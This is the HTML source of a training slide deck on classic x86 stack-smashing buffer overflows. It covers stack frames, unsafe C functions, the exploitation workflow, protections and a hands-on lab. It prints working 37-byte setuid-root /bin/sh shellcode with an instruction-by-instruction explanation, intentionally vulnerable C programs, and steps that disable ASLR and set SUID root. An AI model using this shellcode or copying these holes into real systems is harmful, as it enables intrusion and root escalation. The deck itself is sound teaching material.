smash-talk/index.html

615 lines
17 KiB
HTML
Raw Normal View History

2020-01-16 08:42:45 +01:00
<!DOCTYPE html>
<html>
<head>
2023-03-13 15:23:37 +01:00
<title>♫ Stack smashing like it's 1999 ♫</title>
2020-01-16 08:42:45 +01:00
<meta charset="utf-8">
<style>
@import url(https://fonts.googleapis.com/css?family=Droid+Serif);
@import url(https://fonts.googleapis.com/css?family=Yanone+Kaffeesatz);
@import url(https://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700,400italic);
body {
font-family: 'Droid Serif';
}
h1, h2, h3 {
font-family: 'Yanone Kaffeesatz';
font-weight: 400;
margin-bottom: 0;
}
.remark-slide-content h1 { font-size: 3em; }
.remark-slide-content h2 { font-size: 2em; }
.remark-slide-content h3 { font-size: 1.6em; }
.footnote {
position: absolute;
bottom: 3em;
font-size: 0.7em;
}
li p { line-height: 1.25em; }
.red { color: #fa0000; }
.large { font-size: 2em; }
a, a > code {
color: rgb(249, 38, 114);
text-decoration: none;
}
code {
background: #e7e8e2;
border-radius: 5px;
}
.remark-code, .remark-inline-code { font-family: 'Ubuntu Mono'; }
.remark-code-line-highlighted { background-color: #373832; }
.pull-left {
float: left;
width: 47%;
}
.pull-right {
float: right;
width: 47%;
}
.pull-right ~ p {
clear: both;
}
#slideshow .slide .content code {
font-size: 0.8em;
}
#slideshow .slide .content pre code {
font-size: 0.9em;
padding: 15px;
}
.inverse {
background: #272822;
color: #777872;
text-shadow: 0 0 20px #333;
}
.inverse h1, .inverse h2 {
color: #f3f3f3;
line-height: 0.8em;
}
/* Slide-specific styling */
#slide-inverse .footnote {
bottom: 12px;
left: 20px;
}
#slide-how .slides {
font-size: 0.9em;
position: absolute;
top: 151px;
right: 140px;
}
#slide-how .slides h3 {
margin-top: 0.2em;
}
#slide-how .slides .first, #slide-how .slides .second {
padding: 1px 20px;
height: 90px;
width: 120px;
-moz-box-shadow: 0 0 10px #777;
-webkit-box-shadow: 0 0 10px #777;
box-shadow: 0 0 10px #777;
}
#slide-how .slides .first {
background: #fff;
position: absolute;
top: 20%;
left: 20%;
z-index: 1;
}
#slide-how .slides .second {
position: relative;
background: #fff;
z-index: 0;
}
/* Two-column layout */
.left-column {
color: #777;
width: 20%;
height: 92%;
float: left;
}
.left-column h2:last-of-type, .left-column h3:last-child {
color: #000;
}
.right-column {
width: 75%;
float: right;
padding-top: 1em;
}
</style>
</head>
<body>
<textarea id="source">
name: inverse
layout: true
class: center, middle, inverse
---
2023-03-08 10:32:57 +01:00
# ♫ Stack smashing like it's 1999 ♫
2020-01-16 08:42:45 +01:00
Ward Wouts<br>
https://wizeazz.nl/smash/
---
# Agenda
2023-03-08 10:32:57 +01:00
[//]: # (This is a markdown comment.)
[//]: # (A proper markdown comment needs the empty line above it.)
[//]: # (Two spaces at the end of a line are a linebreak in markdown.)
Introduction
What is a stack?
How does this work?
Vulnerable fuctions
Now what can we do with this?
Shellcode?
Endianness?
Exploitation workflow
Demo
Protections
DIY
Quick Radare2 reference
Quick GDB reference
Shellcode explained
2020-01-16 08:42:45 +01:00
---
# Introduction
---
layout: false
.left-column[
## Introduction
]
.right-column[
2020-01-16 15:05:49 +01:00
C is full of holes, let's get to know one.
2020-01-16 08:42:45 +01:00
2020-01-16 15:05:49 +01:00
Old skool, so no OS or hardware protections. Which today is mostly relevant in IoT. (Remember, the `S` in `IoT` stands for Security.)
2023-02-14 09:33:01 +01:00
Stack smashing is making use of a buffer overflow vulnerability in code using variables on the stack. This type of vulnerability has been known for a long time. This attack was first properly documented in Phrack #49.
2020-01-16 15:05:49 +01:00
.footnote[Phrack #49(http://www.phrack.org/issues/49/14.html#article)]
2020-01-16 08:42:45 +01:00
]
---
template: inverse
# What is a stack?
---
.left-column[
## What is a stack?
]
.right-column[
Stacks in computing architectures are regions of memory where data is added or removed in a last-in-first-out (LIFO) manner.
The stack is used to pass arguments between functions, to allocate space for fixed variables, and to remember how to get back out of the current function.
For x86 systems the stack grows from the largest memory address up.
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack-based_memory_allocation)]
]
---
2020-01-16 15:05:49 +01:00
.left-column[
## Say wut?
]
.right-column[
Whenever a function is called a frame is added to the stack. Whenever a function ends the frame is deleted.
Such a frame consists of variables, a stored stack pointer and a return address.
]
---
.left-column[
## This is not helping you know...
]
.right-column.center.middle[
<img src="Stack.png" width="100%" />
]
---
2020-01-16 08:42:45 +01:00
template: inverse
# How does this work?
---
.left-column[
## How does this work?
]
.right-column[
## Start with some code:
``` C
#include <string.h>
void foo (char *bar)
{
char c[12];
strcpy(c, bar); // no bounds checking
}
int main (int argc, char **argv)
{
foo(argv[1]);
return 0;
}
```
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
.left-column[
## How does this work?
]
.right-column.center.middle[
<img src="Stack_Overflow_2.png" width="70%" />
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
.left-column[
## How does this work?
]
.right-column.center.middle[
<img src="Stack_Overflow_3.png" width="70%" />
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
.left-column[
## How does this work?
]
.right-column.center.middle[
<img src="Stack_Overflow_4.png" width="85%" />
.footnote[Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Stack_buffer_overflow)]
]
---
template: inverse
# Vulnerable functions
---
.left-column[
## Vulnerable functions
]
.right-column[
Anything that doesn't take buffer sizes into account. The big ones being:
- gets
- strcpy
- sprintf
]
---
template: inverse
# Now what can we do with this?
---
.left-column[
## Now what can we do with this?
]
.right-column[
We can change the flow through the program:
- Jump to a different function in a known spot in memory
- Jump to our own shellcode somewhere in the buffer (can also write past the return address)
- Jump to our own shellcode in the environment
*Full nerd: By overwriting the return address we can change to which instructions the Instruction Pointer (`EIP` in 32-bit x86, `RIP` in 64-bit x86) points. `EIP` and `RIP` are so called registers. There are more, like `EBP`/`RBP` which is used for pointing at the stack frame pointer. The other registers are used like variables.*
.footnote[Lots of shellcode [here](http://shell-storm.org/shellcode/)]
]
---
template: inverse
# Shellcode?
---
.left-column[
## Shellcode?
]
.right-column[
In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. [1]
2023-02-14 17:16:51 +01:00
Here's a bit of shellcode to open `/bin/sh` on 32-bit x86 (37 bytes) [2]:
2020-01-16 08:42:45 +01:00
```
2023-02-14 17:16:51 +01:00
\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2
\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89
\xe3\x52\x53\x89\xe1\xcd\x80
2020-01-16 08:42:45 +01:00
```
As strings in C are NULL terminated, shellcode should not have `\x00` in it.
`\x90` is a NOP (No Operand) in x86. You can use a bunch of those in front of shellcode to increase the chances of ending up in your shellcode. This is called a NOP-sled.
Sometimes swapping out some shellcode for some other shellcode is the trick.
2023-02-14 17:16:51 +01:00
.footnote[[1] Borrowed from [wikipedia](https://en.wikipedia.org/wiki/Shellcode)<br>[2] Shellcode from [shell-storm](http://shell-storm.org/shellcode/files/shellcode-251.php)]
2020-01-16 08:42:45 +01:00
]
---
template: inverse
# Endianness?
---
.left-column[
## Endianness?
]
.right-column[
In computing, endianness refers to the order of bytes (or sometimes bits) within a binary representation of a number. It can also be used more generally to refer to the internal ordering of any representation, such as the digits in a numeral system or the sections of a date.
In its most common usage, endianness indicates the ordering of bytes within a multi-byte number. A **big-endian** ordering places the most significant byte first and the least significant byte last, while a **little-endian** ordering does the opposite. For example, consider the unsigned hexadecimal number 0x1234, which requires at least two bytes to represent. In a big-endian ordering they would be `[ 0x12, 0x34 ]`, while in a little-endian ordering, the bytes would be arranged `[ 0x34, 0x12 ]`.
x86 is a **little-endian** architecture
]
---
template: inverse
2023-02-15 11:09:42 +01:00
# Exploitation workflow
---
.left-column[
## Exploitation workflow
]
.right-column[
- Find input to overflow
- Figure out exact needed length for overflow to overwrite return address
- Place shellcode in memory, ideally with a NOP-sled in front
- Figure out shellcode location
- Use overflow to point the return address at shellcode/NOP-sled
- Do take endianness into account
]
---
template: inverse
2020-01-16 08:42:45 +01:00
# Demo
---
.left-column[
## Demo
]
.right-column[
This is the code for the binary:
``` C
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char * argv[]){
char buf[128];
if(argc == 1){
printf("Usage: %s argument\n", argv[0]);
exit(1);
}
strcpy(buf,argv[1]);
printf("%s", buf);
return 0;
}
```
Binary here: https://wizeazz.nl/smash/code/demo
.footnote[Borrowed from [Overthewire.org](https://overthewire.org/wargames/narnia/)]
]
---
template: inverse
2023-02-14 09:33:01 +01:00
# Protections
---
.left-column[
## Protections
]
.right-column[
- Stack canaries<br>
2023-03-13 15:23:37 +01:00
Place a value before the return address and check if it's been changed before returning from a function. (Good explainer here: https://www.sans.org/blog/stack-canaries-gingerly-sidestepping-the-cage/)
2023-02-14 09:33:01 +01:00
- Nonexecutable stack<br>
W^X (write or execute) won't execute code on the stack (but will still follow return addresses).
- Randomization<br>
Change function and stack addresses around so whenever a program is executed the locations are different.
All these can be worked around given the right conditions. They just make things annoying, euh, harder.
]
---
template: inverse
2020-01-16 08:42:45 +01:00
# DIY
---
.left-column[
## DIY
]
.right-column[
Now it's your turn.
2023-02-14 17:16:51 +01:00
Log into the provided VM. Binary and shellcode are in `/smash`
2020-01-16 08:42:45 +01:00
**Alternative** If you want to use your own system, Do this as preparation:
- Install radare2: `$ sudo apt-get install -y radare2`<br>**OR**<br> `$ git clone https://github.com/radareorg/radare2.git && cd radare2 && sys/user.sh`<br>for a persistent installation.
- Turn off ASLR: `$ sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space"`
- Check: `$ sysctl -a --pattern randomize`
- Enable debugging: `sudo sh -c "echo 0 > /proc/sys/kernel/yama/ptrace_scope"`
- Download binary:<br> `$ curl -O https://wizeazz.nl/smash/code/diy`
- Make executable: `$ chmod a+x diy`
.footnote[Linux and ASLR settings [here](https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/)]
]
---
.left-column[
## DIY
]
.right-column[
Assignment:
- Make the binary print `You win`.
This is the code for the binary:
``` C
#include <stdio.h>
#include <strings.h>
void winner()
{
printf("You win\n");
}
void whoareyou()
{
char name[250];
printf("What's your name? ");
gets(name);
printf("\nHello, %s\n", name);
}
int main()
{
whoareyou();
printf("You lose\n");
}
```
]
---
.left-column[
## DIY
]
.right-column[
Now, if you managed that:
- Try to make it open a shell via shellcode. Especially fun if you make the binary SUID root:<br> `$ sudo chown root.root diy && sudo chmod u+s diy`
2023-02-14 17:16:51 +01:00
- Can be done both via shellcode in an environment variable (usually more reliable **HINT**) and via shellcode in the buffer
2020-01-16 08:42:45 +01:00
Tip: `gets()` behaves weirdly and will close your shell immediately. The trick is to do something like:<br>
`$ (echo -e MYINPUT; cat)|./diy`<br>
This won't give you a prompt!
]
---
template: inverse
# Quick Radare2 reference
---
.left-column[
## Quick Radare2 reference
]
.right-column[
- `r2 -Ad <program>` start radare2 in debugger mode and analyse program
- `afl` list functions
- `pdf@<function>` disassemble function (e.g. `pdf@main`)
- `pxw @<location>` print memory (e.g. `pxw @ebp`)
- `db <address>` Set breakpoint
- `dc` continue to breakpoint
- `ds` step into
- `V` go to visual mode
- `q` leave visual mode
- `p` next view (2x for debugger view)
- `s` step into
- `S` step over
- `?v HEX` build in calculator (e.g. `?v 0xdead0000+0xbeef`)
- `?vi HEX` hex to integer (e.g. `?vi 0x400`)
2023-02-14 17:16:51 +01:00
]
---
template: inverse
# Quick GDB reference
---
.left-column[
## Quick GDB reference
]
.right-column[
- `gdb --args <program> <arguments>` start gdb with a program with arguments
- `disas <function>` disassemble a function
- `b *<address>` set a breakpoint on an address
- `x/200x $esp` show the memory contents for 200 bytes starting at the address $esp points to
2023-02-15 08:57:22 +01:00
- `x/200c <addr>` show the memory contents for 200 characters starting at the address
2023-02-14 17:16:51 +01:00
- `r` run
- `r < foo.txt` run with stdin filled from a file
- `c` continue
- `s` step into
- `info functions` list all functions
2023-02-15 08:57:22 +01:00
- `p (char*)getenv("PATH")` find the memory location of an environment variable for the running program (use a breakpoint!)
Many improvements exist to make gdb nicer for reverse engineering, such as:
- https://github.com/pwndbg/pwndbg
- https://github.com/hugsy/gef
- https://github.com/longld/peda
2020-01-16 08:42:45 +01:00
]
2023-02-15 12:04:05 +01:00
---
template: inverse
# Shellcode explained
---
.left-column[
## Shellcode explained
]
.right-column[
Shellcode from: http://shell-storm.org/shellcode/files/shellcode-251.html
```
2023-03-08 10:32:57 +01:00
/* (Linux/x86) setuid(0) + setgid(0) + execve("/bin/sh", ["/bin/sh", NULL])
* - 37 bytes - xgc@gotfault.net */
2023-02-15 12:04:05 +01:00
"\x6a\x17" // push $0x17
"\x58" // pop %eax
"\x31\xdb" // xor %ebx, %ebx
"\xcd\x80" // int $0x80
"\x6a\x2e" // push $0x2e
"\x58" // pop %eax
"\x53" // push %ebx
"\xcd\x80" // int $0x80
"\x31\xd2" // xor %edx, %edx
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80" // int $0x80
```
]
---
.left-column[
## Shellcode explained
]
.right-column[
```
2023-02-16 13:07:42 +01:00
push $0x17 Put 0x17 = 23 = setuid
pop %eax in EAX
xor %ebx, %ebx Make EBX (argument for setuid) 0
int $0x80 Execute command
2023-02-15 12:04:05 +01:00
```
`int 0x80` is a legacy way of doing a syscall to the kernel. See also:
http://www.linfo.org/int_0x80.html As this is a 32-bit program, the list of syscalls can be found here: `/usr/include/asm/unistd_32.h` Which shows the values in decimal: 0x17 = 23 = setuid.
So, whats done here is put 0x17 in EAX, and make EBX (the argument for setgid, see https://faculty.nps.edu/cseagle/assembly/sys_call.html) 0 using a XOR. Then call int 0x80. Resulting in a `setuid 0`.
]
---
.left-column[
## Shellcode explained
]
.right-column[
```
2023-02-16 13:07:42 +01:00
push $0x2e Put 0x2e = 46 = setgid
pop %eax in EAX
push %ebx ... this baffles me, seems unneeded ...
int $0x80 Execute command
2023-02-15 12:04:05 +01:00
```
Pretty much the same as last snippet, but for 0x2e = 46 = setgid.
2023-02-16 13:07:42 +01:00
Not only does that push EBX seem unneeded, removing it has no impact on getting a shell. So in explaining this shellcode I managed to turn it into 36 bytes instead of 37.
2023-02-15 12:04:05 +01:00
]
---
.left-column[
## Shellcode explained
]
.right-column[
```
2023-02-16 13:07:42 +01:00
xor %edx, %edx Make EDX 0
push $0xb Put 0xb = 11 = execve
pop %eax in EAX
push %edx Push NULL terminated
push $0x68732f2f command
push $0x6e69622f string to stack
mov %esp, %ebx Point EBX at command string
push %edx Push NULL to stack (no more arguments)
push %ebx Push pointer to command str
mov %esp, %ecx Point ECX at arg list
2023-03-08 10:32:57 +01:00
int $0x80 Execute command in EAX
2023-02-15 12:04:05 +01:00
```
2023-02-16 13:07:42 +01:00
Another `int 0x80` here for syscall 0xb = 11 = execve. 0x68732f2f in ASCII chars = `hs//`, but little endian, so read `//sh`. Same for 0x6e69622f, which gets `/bin`. Together this makes for `/bin//sh`. That double `/` is here to fill that 32-bit word. The EDX that is set to 0 and pushed makes up for the null string terminator.
2023-02-15 12:04:05 +01:00
2023-02-16 13:07:42 +01:00
The arguments for execve will not fit in registers, as they're variable size. So instead ECX points at a list of pointers to strings (commandname + arguments) on the stack (ie ARGV in C). EBX points to the command to execute.
2023-02-15 12:04:05 +01:00
]
2020-01-16 08:42:45 +01:00
</textarea>
<script src="https://remarkjs.com/downloads/remark-latest.min.js">
</script>
<script>
var slideshow = remark.create();
</script>
</body>
</html>